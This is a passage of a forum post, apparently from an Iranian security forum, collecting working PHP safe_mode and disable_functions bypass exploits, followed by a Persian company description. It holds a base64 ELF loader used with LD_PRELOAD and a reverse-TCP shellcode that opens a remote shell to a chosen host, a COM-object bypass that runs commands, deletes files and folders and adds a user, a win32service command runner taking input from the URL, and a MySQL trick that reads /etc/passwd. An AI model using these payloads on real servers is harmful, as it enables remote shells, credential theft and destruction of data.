LmR0b3JzAC5qY3IALmdvdAAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAGwAAAAUAAAACAAAAlAAAAJQAAADcAAAAAgAAAAAAAAAEAAAABAAAACEA AAALAAAAAgAAAHABAABwAQAAQAIAAAMAAAAUAAAABAAAABAAAAApAAAAAwAAAAIAAACwAwAAsAMA ALQAAAAAAAAAAAAAAAEAAAAAAAAAMQAAAAkAAAACAAAAZAQAAGQEAAAwAAAAAgAAAAAAAAAEAAAA CAAAADoAAAAJAAAAAgAAAJQEAACUBAAAQAAAAAIAAAAHAAAABAAAAAgAAABDAAAAAQAAAAYAAADU BAAA1AQAABEAAAAAAAAAAAAAAAQAAAAAAAAAPgAAAAEAAAAGAAAA6AQAAOgEAACQAAAAAAAAAAAA AAAEAAAABAAAAEkAAAABAAAABgAAAHgFAAB4BQAArAEAAAAAAAAAAAAABAAAAAAAAABPAAAAAQAA AAYAAAAkBwAAJAcAAAwAAAAAAAAAAAAAAAQAAAAAAAAAVQAAAAEAAAACAAAAMAcAADAHAACxAAAA AAAAAAAAAAABAAAAAAAAAF0AAAABAAAAAwAAAOQXAADkBwAACAAAAAAAAAAAAAAABAAAAAAAAABj AAAAAQAAAAIAAADsFwAA7AcAAAQAAAAAAAAAAAAAAAQAAAAAAAAAbQAAAAYAAAADAAAA8BcAAPAH AACgAAAAAwAAAAAAAAAEAAAACAAAAHYAAAABAAAAAwAAAJAYAACQCAAACAAAAAAAAAAAAAAABAAA AAAAAAB9AAAAAQAAAAMAAACYGAAAmAgAAAgAAAAAAAAAAAAAAAQAAAAAAAAAhAAAAAEAAAADAAAA oBgAAKAIAAAEAAAAAAAAAAAAAAAEAAAAAAAAAIkAAAABAAAAAwAAAKQYAACkCAAAPAAAAAAAAAAA AAAABAAAAAQAAACOAAAACAAAAAMAAADgGAAA4AgAABwAAAAAAAAAAAAAAAQAAAAAAAAAkwAAAAEA AAAAAAAAAAAAAOAIAABvAAAAAAAAAAAAAAABAAAAAAAAABEAAAADAAAAAAAAAAAAAABPCQAAnAAA AAAAAAAAAAAAAQAAAAAAAAABAAAAAgAAAAAAAAAAAAAAhA0AABAEAAAWAAAAMQAAAAQAAAAQAAAA CQAAAAMAAAAAAAAAAAAAAJQRAAD1AQAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAlAAAAAAAAAADAAEAAAAAAHABAAAAAAAAAwACAAAAAACwAwAAAAAAAAMAAwAAAAAAZAQAAAAA AAADAAQAAAAAAJQEAAAAAAAAAwAFAAAAAADUBAAAAAAAAAMABgAAAAAA6AQAAAAAAAADAAcAAAAA AHgFAAAAAAAAAwAIAAAAAAAkBwAAAAAAAAMACQAAAAAAMAcAAAAAAAADAAoAAAAAAOQXAAAAAAAA AwALAAAAAADsFwAAAAAAAAMADAAAAAAA8BcAAAAAAAADAA0AAAAAAJAYAAAAAAAAAwAOAAAAAACY GAAAAAAAAAMADwAAAAAAoBgAAAAAAAADABAAAAAAAKQYAAAAAAAAAwARAAAAAADgGAAAAAAAAAMA EgAAAAAAAAAAAAAAAAADABMAAAAAAAAAAAAAAAAAAwAUAAAAAAAAAAAAAAAAAAMAFQAAAAAAAAAA AAAAAAADABYAAQAAAAAAAAAAAAAABADx/yIAAAAAAAAAAAAAAAQA8f8xAAAAAAAAAAAAAAAEAPH/ AQAAAAAAAAAAAAAABADx/zwAAAAAAAAAAAAAAAQA8f9HAAAAkBgAAAAAAAABAA4AVQAAAJgYAAAA AAAAAQAPAGMAAADsFwAAAAAAAAEADAB2AAAAoBgAAAAAAAABABAAgwAAAOgXAAAAAAAAAQALAIcA AADgGAAAAQAAAAEAEgCTAAAAeAUAAAAAAAACAAgAqQAAAOQYAAAYAAAAAQASALIAAADwBQAAAAAA AAIACAA8AAAAAAAAAAAAAAAEAPH/vgAAAJQYAAAAAAAAAQAOAMsAAACcGAAAAAAAAAEADwDYAAAA 7BcAAAAAAAABAAwA5gAAAKAYAAAAAAAAAQAQAPIAAAD0BgAAAAAAAAIACAAIAQAAAAAAAAAAAAAE APH/IgAAAAAAAAAAAAAABADx/zEAAAAAAAAAAAAAAAQA8f8IAQAAAAAAAAAAAAAEAPH/KQEAAAAA AAAAAAAABADx/zUBAADkFwAAAAAAAAECCwBCAQAAAAAAAAAAAAAQAAAASwEAAPAXAAAAAAAAEQDx /1QBAAAAAAAAAAAAACAAAABjAQAAVAYAAJ0AAAASAAgAagEAANQEAAAAAAAAEgAGAHABAAAAAAAA AAAAACAAAACIAQAAAAAAAAAAAAAQAAAAjQEAAOAYAAAAAAAAEADx/5kBAAAkBwAAAAAAABIACQCf AQAA4BgAAAAAAAAQAPH/pgEAAKQYAAAAAAAAEQDx/7wBAAD8GAAAAAAAABAA8f/BAQAAAAAAAAAA AAAQAAAAxgEAAAAAAAAAAAAAEAAAAMsBAAAAAAAAAAAAACAAAADfAQAAAAAAAAAAAAAgAAAAAC91 c3Ivc3JjL2xpYi9jc3UvaTM4Ni1lbGYvY3J0aS5TADxjb21tYW5kIGxpbmU+ADxidWlsdC1pbj4A Y3J0c3R1ZmYuYwBfX0NUT1JfTElTVF9fAF9fRFRPUl9MSVNUX18AX19FSF9GUkFNRV9CRUdJTl9f AF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AG9iamVj dC4yAGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBf X0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAL3Vzci9zcmMvbGliL2NzdS9pMzg2LWVs Zi9jcnRuLlMAc2hlbGxjb2RlLmMAX19kc29faGFuZGxlAHVuc2V0ZW52AF9EWU5BTUlDAF9fY3hh X2ZpbmFsaXplAGdldHVpZABfaW5pdABfX2RlcmVnaXN0ZXJfZnJhbWVfaW5mbwByZWFkAF9fYnNz X3N0YXJ0AF9maW5pAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABleGl0AG9wZW4A X0p2X1JlZ2lzdGVyQ2xhc3NlcwBfX3JlZ2lzdGVyX2ZyYW1lX2luZm8A"; }else{ // default: linux // linux shellcode loader (x86) $shellcode_loader= "f0VMRgEBAQAAAAAAAAAAAAMAAwABAAAAIAQAADQAAACIEQAAAAAAADQAIAAGACgAGwAYAAEAAAAA AAAAAAAAAAAAAABIBgAASAYAAAUAAAAAEAAAAQAAAAwPAAAMHwAADB8AABABAAAYAQAABgAAAAAQ AAACAAAAIA8AACAfAAAgHwAAyAAAAMgAAAAGAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAA AAYAAAAEAAAAUuV0ZAwPAAAMHwAADB8AAPQAAAD0AAAABAAAAAEAAACAFQRlAAAAAAAAAAAAAAAA AAAAAAAAAAAAKAAABAAAAAMAAAAOAAAADAAAAAcAAAAGAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAN AAAACwAAAAkAAAADAAAABQAAAAgAAAABAAAACgAAAAQAAAADAAAACAAAAAIAAAAGAAAAiAAhAQDE QAkIAAAACwAAAA0AAAAGpIf/uuOSfENF1ezYcVgcuY3xDuvT7w4AAAAAAAAAAAAAAAAAAAAATwAA AAAAAAB6AAAAEgAAAAEAAAAAAAAAAAAAACAAAAArAAAAAAAAAAAAAAAgAAAARgAAAAAAAAD+AAAA EgAAAFkAAAAAAAAAegAAABIAAAAcAAAAAAAAAAsBAAAiAAAAVAAAAAAAAAD9AAAAEgAAAD8AAAAM BQAAvQAAABIACwB7AAAAJCAAAAAAAAAQAPH/aAAAABwgAAAAAAAAEADx/28AAAAcIAAAAAAAABAA 8f8QAAAAkAMAAAAAAAASAAkAFgAAAAgGAAAAAAAAEgAMAABfX2dtb25fc3RhcnRfXwBfaW5pdABf ZmluaQBfX2N4YV9maW5hbGl6ZQBfSnZfUmVnaXN0ZXJDbGFzc2VzAGdldHVpZAB1bnNldGVudgBv cGVuAGV4aXQAcmVhZABsaWJjLnNvLjYAX2VkYXRhAF9fYnNzX3N0YXJ0AF9lbmQAR0xJQkNfMi4x LjMAR0xJQkNfMi4wAAAAAgAAAAAAAgACAAMAAgABAAEAAQABAAEAAQAAAAEAAgBeAAAAEAAAAAAA AABzH2kJAAADAIAAAAAQAAAAEGlpDQAAAgCMAAAAAAAAABggAAAIAAAA6B8AAAYCAADsHwAABgMA APAfAAAGBgAAACAAAAcBAAAEIAAABwIAAAggAAAHBAAADCAAAAcFAAAQIAAABwYAABQgAAAHBwAA VYnlg+wI6IUAAADoMAEAAOgrAgAAycMA/7MEAAAA/6MIAAAAAAAAAP+jDAAAAGgAAAAA6eD///// oxAAAABoCAAAAOnQ/////6MUAAAAaBAAAADpwP////+jGAAAAGgYAAAA6bD/////oxwAAABoIAAA AOmg/////6MgAAAAaCgAAADpkP///wAAAAAAAAAAVYnlU4PsBOgAAAAAW4HDyBsAAIuT9P///4XS dAXohv///1hbycOQkJCQkJCQkJCQVYnlVlPorQAAAIHDmhsAAIPsEIC7KAAAAAB1XYuD/P///4XA dA6LgyQAAACJBCTodP///4uLLAAAAI2DJP///42TIP///ynQwfgCjXD/OfFzII22AAAAAI1BAYmD LAAAAP+UgyD///+LiywAAAA58XLmxoMoAAAAAYPEEFteXcNVieVT6C4AAACBwxsbAACD7ASLkyj/ //+F0nQVi5P4////hdJ0C42DKP///4kEJP/Sg8QEW13Dixwkw5BVieVTgew0BAAA6Oz///+Bw9ka AACNgzDm//+JBCToqf7//8eF5vv//y90bXDHher7//8vLlgxx4Xu+///MS1JSMeF8vv//1NURUFm x4X2+///TQDHRCQEAAAAAI2DO+b//4kEJOhC/v//iUX4g334AHkMxwQkAQAAAOh9/v//x0QkCAAE AACNhfj7//+JRCQEi0X4iQQk6ED+//+FwHkMxwQkAQAAAOhQ/v//jYX4+////9CBxDQEAABbXcOQ kJCQkJCQVYnlVlPoLf///4HDGhoAAIuDGP///4P4/3QZjbMY////jbQmAAAAAIPuBP/QiwaD+P91 9FteXcNVieVTg+wE6AAAAABbgcPgGQAA6DD+//9ZW8nDTERfUFJFTE9BRAAvdG1wLy5YMTEtSUhT VEVBTQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////wAAAAD/////AAAAAAAAAAABAAAA XgAAAAwAAACQAwAADQAAAAgGAAAEAAAA9AAAAPX+/29AAQAABQAAAFwCAAAGAAAAfAEAAAoAAACW AAAACwAAABAAAAADAAAA9B8AAAIAAAAwAAAAFAAAABEAAAAXAAAAYAMAABEAAABAAwAAEgAAACAA AAATAAAACAAAAP7//28QAwAA////bwEAAADw//9v8gIAAPr//28BAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAfAAAAAAAAAAAAAL4DAADOAwAA 3gMAAO4DAAD+AwAADgQAABggAAAAR0NDOiAoR2VudG9vIDQuMy4xLXIxIHAxLjEpIDQuMy4xAABH Q0M6IChHZW50b28gNC4zLjIgcDEuMSkgNC4zLjIAAEdDQzogKEdlbnRvbyA0LjMuMiBwMS4xKSA0 LjMuMgAAR0NDOiAoR2VudG9vIDQuMy4yIHAxLjEpIDQuMy4yAABHQ0M6IChHZW50b28gNC4zLjEt cjEgcDEuMSkgNC4zLjEAAC5zeW10YWIALnN0cnRhYgAuc2hzdHJ0YWIALmdudS5oYXNoAC5keW5z eW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbC5keW4ALnJlbC5wbHQA LmluaXQALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWUALmN0b3JzAC5kdG9ycwAuamNyAC5k eW5hbWljAC5nb3QALmdvdC5wbHQALmRhdGEALmJzcwAuY29tbWVudAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8AAAAFAAAAAgAAAPQAAAD0AAAATAAAAAMAAAAAAAAA BAAAAAQAAAAbAAAA9v//bwIAAABAAQAAQAEAADwAAAADAAAAAAAAAAQAAAAEAAAAJQAAAAsAAAAC AAAAfAEAAHwBAADgAAAABAAAAAEAAAAEAAAAEAAAAC0AAAADAAAAAgAAAFwCAABcAgAAlgAAAAAA AAAAAAAAAQAAAAAAAAA1AAAA////bwIAAADyAgAA8gIAABwAAAADAAAAAAAAAAIAAAACAAAAQgAA AP7//28CAAAAEAMAABADAAAwAAAABAAAAAEAAAAEAAAAAAAAAFEAAAAJAAAAAgAAAEADAABAAwAA IAAAAAMAAAAAAAAABAAAAAgAAABaAAAACQAAAAIAAABgAwAAYAMAADAAAAADAAAACgAAAAQAAAAI AAAAYwAAAAEAAAAGAAAAkAMAAJADAAAXAAAAAAAAAAAAAAAEAAAAAAAAAF4AAAABAAAABgAAAKgD AACoAwAAcAAAAAAAAAAAAAAABAAAAAQAAABpAAAAAQAAAAYAAAAgBAAAIAQAAOgBAAAAAAAAAAAA ABAAAAAAAAAAbwAAAAEAAAAGAAAACAYAAAgGAAAcAAAAAAAAAAAAAAAEAAAAAAAAAHUAAAABAAAA AgAAACQGAAAkBgAAHQAAAAAAAAAAAAAAAQAAAAAAAAB9AAAAAQAAAAIAAABEBgAARAYAAAQAAAAA AAAAAAAAAAQAAAAAAAAAhwAAAAEAAAADAAAADB8AAAwPAAAIAAAAAAAAAAAAAAAEAAAAAAAAAI4A AAABAAAAAwAAABQfAAAUDwAACAAAAAAAAAAAAAAABAAAAAAAAACVAAAAAQAAAAMAAAAcHwAAHA8A AAQAAAAAAAAAAAAAAAQAAAAAAAAAmgAAAAYAAAADAAAAIB8AACAPAADIAAAABAAAAAAAAAAEAAAA CAAAAKMAAAABAAAAAwAAAOgfAADoDwAADAAAAAAAAAAAAAAABAAAAAQAAACoAAAAAQAAAAMAAAD0 HwAA9A8AACQAAAAAAAAAAAAAAAQAAAAEAAAAsQAAAAEAAAADAAAAGCAAABgQAAAEAAAAAAAAAAAA AAAEAAAAAAAAALcAAAAIAAAAAwAAABwgAAAcEAAACAAAAAAAAAAAAAAABAAAAAAAAAC8AAAAAQAA AAAAAAAAAAAAHBAAAKYAAAAAAAAAAAAAAAEAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAMIQAADFAAAA AAAAAAAAAAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAADAFQAAsAIAABoAAAAeAAAABAAAABAAAAAJ AAAAAwAAAAAAAAAAAAAAcBgAAAsBAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAD0AAAAAAAAAAMAAQAAAAAAQAEAAAAAAAADAAIAAAAAAHwBAAAAAAAAAwADAAAAAABcAgAAAAAA AAMABAAAAAAA8gIAAAAAAAADAAUAAAAAABADAAAAAAAAAwAGAAAAAABAAwAAAAAAAAMABwAAAAAA YAMAAAAAAAADAAgAAAAAAJADAAAAAAAAAwAJAAAAAACoAwAAAAAAAAMACgAAAAAAIAQAAAAAAAAD AAsAAAAAAAgGAAAAAAAAAwAMAAAAAAAkBgAAAAAAAAMADQAAAAAARAYAAAAAAAADAA4AAAAAAAwf AAAAAAAAAwAPAAAAAAAUHwAAAAAAAAMAEAAAAAAAHB8AAAAAAAADABEAAAAAACAfAAAAAAAAAwAS AAAAAADoHwAAAAAAAAMAEwAAAAAA9B8AAAAAAAADABQAAAAAABggAAAAAAAAAwAVAAAAAAAcIAAA AAAAAAMAFgAAAAAAAAAAAAAAAAADABcAAQAAAAAAAAAAAAAABADx/w0AAAD0HwAAAAAAAAEC8f8j AAAAGCAAAAAAAAABAhUAMAAAABgfAAAAAAAAAQIQAD0AAAAHBQAAAAAAAAICCwBUAAAAIB8AAAAA AAABAvH/XQAAAAAAAAB6AAAAEgAAAG0AAAAAAAAAAAAAACAAAAB8AAAAAAAAAAAAAAAgAAAAkAAA AAAAAAD+AAAAEgAAAKQAAAAIBgAAAAAAABIADACqAAAAAAAAAHoAAAASAAAAugAAABwgAAAAAAAA EADx/8YAAAAMBQAAvQAAABIACwDNAAAAJCAAAAAAAAAQAPH/0gAAABwgAAAAAAAAEADx/9kAAAAA AAAACwEAACIAAAD1AAAAAAAAAP0AAAASAAAABQEAAJADAAAAAAAAEgAJAABzaGVsbGNvZGUuYwBf R0xPQkFMX09GRlNFVF9UQUJMRV8AX19kc29faGFuZGxlAF9fRFRPUl9FTkRfXwBfX2k2ODYuZ2V0 X3BjX3RodW5rLmJ4AF9EWU5BTUlDAG9wZW5AQEdMSUJDXzIuMABfX2dtb25fc3RhcnRfXwBfSnZf UmVnaXN0ZXJDbGFzc2VzAHVuc2V0ZW52QEBHTElCQ18yLjAAX2ZpbmkAcmVhZEBAR0xJQkNfMi4w AF9fYnNzX3N0YXJ0AGdldHVpZABfZW5kAF9lZGF0YQBfX2N4YV9maW5hbGl6ZUBAR0xJQkNfMi4x LjMAZXhpdEBAR0xJQkNfMi4wAF9pbml0AA==" ; } if (!function_exists('file_put_contents')){ function file_put_contents($filename, $data){ $f = @fopen($filename, 'w'); if (!$f){ return false; } else{ $bytes = fwrite($f, $data); fclose($f); return $bytes; } } } // Note: change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp' file_put_contents('/tmp/shellcode.so' , base64_decode($shellcode_loader)); $ip = gethostbyname($host); $port1 = sprintf('%c', ($port>> 8)&255 ); $port2 = sprintf('%c', ($port>> 0)&255 ); $part = explode('.', $ip); //$HEXIP = sprintf('%02x%02x%02x%02x', $part[0], $part[1], $part[2], $part[3]); $STRINGIP = sprintf('%c%c%c%c', $part[0], $part[1], $part[2], $part[3]); /* * linux/x86/shell_reverse_tcp - 71 bytes * [url]http://www.metasploit.com[/url] * Encoder: generic/none * LHOST=$STRINGIP, LPORT=$port1.$port2, ReverseConnectRetries=5, * PrependSetresuid=false, PrependSetreuid=false, * PrependSetuid=false, PrependChrootBreak=false, * AppendExit=false */ $Xshellcode = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80". "\x5b\x5e\x68".$STRINGIP."\x66\x68".$port1.$port2."\x66\x53\x6a\x10". "\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f". "\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69". "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x00" ; if(isset($_REQUEST['shellcode'])){ // just for fans of metasploit $Xshellcode=base64_decode($_REQUEST['shellcode']); } file_put_contents("/tmp/.X11-IHSTEAM", $Xshellcode); $cwd = '/tmp/'; $env = array('LD_PRELOAD' => '/tmp/shellcode.so'); unset($var); $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w")); // BOOM proc_open('IHSteam', $descriptorspec, $var, $cwd, $env); mail("IHSteam","IHSteam","IHSteam","IHSteam"); ?>
  13. PHP 5.x COM functions safe_mode and disable_function bypass <?php //PHP 5.x COM functions safe_mode and disable_function bypass //author: shinnai //mail: shinnai[at]autistici[dot]org //site: [url]http://shinnai.altervista.org[/url] //dork: intitle:phpinfo intext:"php version" +windows (thanks to rgod) //Tested on xp Pro sp2 full patched, worked both from the cli and on apache //from: [url]http://www.phpfreaks...ge/ref.com.html[/url] //Requirements: //COM functions are only available for the Windows version of PHP. //.Net support requires PHP 5 and the .Net runtime. //Installation: //There is no installation needed to use these functions; they are part of the PHP core. -> (sounds good) //The windows version of PHP has built in support for this extension. You do not need to //load any additional extension in order to use these functions. //You are responsible for installing support for the various COM objects that you intend //to use (such as MS Word); we don't and can't bundle all of those with PHP. //mmm... I don't know how many people use Apache and PHP on Windows servers but I suppose there are //a lot of users if PHP developers decide to implement COM functions as part of PHP core. //take a look here: intitle:phpinfo intext:"php version" +windows (thanks to rgod). //Anyway, I think they should take much care on security due to the fact that, through these //functions, you can seriously compromise a pc. //For remote execution you need (naturally) to use a server that is MS based, //e.g. Apache for win configured for working with PHP. //In this scenario, someone could upload a script and then use it to damnage the server. //Local execution simply bypass all Windows protections against execution of dangerous //COM objects (even kill-bit) due to the fact that the script is executed from a client that //does not check these settings. //php.ini settings: //safe_mode = On //disable_functions = com_load_typelib //open_basedir = htdocs //Remote execution requires that open_basedir is disabled $mPath = str_repeat("..\\",20); $compatUI = new COM('{0355854A-7F23-47E2-B7C3-97EE8DD42CD8}'); //this one uses compatUI.dll $compatUI->RunApplication("something", "notepad.exe", 1); //to run notepad.exe $wscript = new COM('wscript.shell'); //this one uses wscript.exe $wscript->Run("cmd.exe /c calc.exe"); //to run calc.exe $FSO = new COM('Scripting.FileSystemObject'); //this one uses wshom.ocx $FSO->OpenTextFile($mPath."something.bat", 8, true); //to create a batch file on server... yes, //if you want you can write to this batch file $FSOdelFile = new COM('Scripting.FileSystemObject'); //this one uses wshom.ocx $FSOdelFile->DeleteFile($mPath."PathToFiles\\*.txt", True); //to delete all files with txt extension $FSOdelFolder = new COM('Scripting.FileSystemObject'); //this one uses wshom.ocx $FSOdelFolder->DeleteFolder($mPath."FolderToDelete", True); //to delete an entire folder $shgina = new COM('{60664CAF-AF0D-0004-A300-5C7D25FF22A0}'); //this one uses shgina.dll $shgina->Create("shinnai"); //to add an user ?>
  14. PHP 5.x (win32service) Local Safe Mode Bypass Exploit <?php $command=(isset($_GET['CMD']))?$_GET['CMD']:'dir'; #cammand $dir=ini_get('upload_tmp_dir'); #Directory to store command's output if(!extension_loaded('win32service'))die('win32ser vice extension not found!'); $name=$dir."\\".uniqid('NJ'); $n=uniqid('NJ'); $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec']; win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\"")); win32_start_service($n); win32_stop_service($n); win32_delete_service($n); $exec=file_get_contents($name); unlink($name); echo "<pre>".htmlspecialchars($exec)."</pre>"; ?>
  15. . Hi All Friends , Today we Have Public And P8 Methods & Exploits For Bypass Safe Mode : First PHP <= 4.4.7 / 5.2.3 MySQL/MySQLi Safe Mode Bypass Vulnerability <?php file_get_contents('/etc/passwd'); $l = mysql_connect("localhost", "root"); mysql_query("CREATE DATABASE a"); mysql_query("CREATE TABLE a.a (a varchar(1024))"); mysql_query("GRANT SELECT,INSERT ON a.a TO 'aaaa'@'localhost'"); mysql_close($l); mysql_connect("localhost", "aaaa"); mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a"); $result = mysql_query("SELECT a FROM a.a"); while(list($row) = mysql_fetch_row($result)) print $row . chr(10); ?>

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...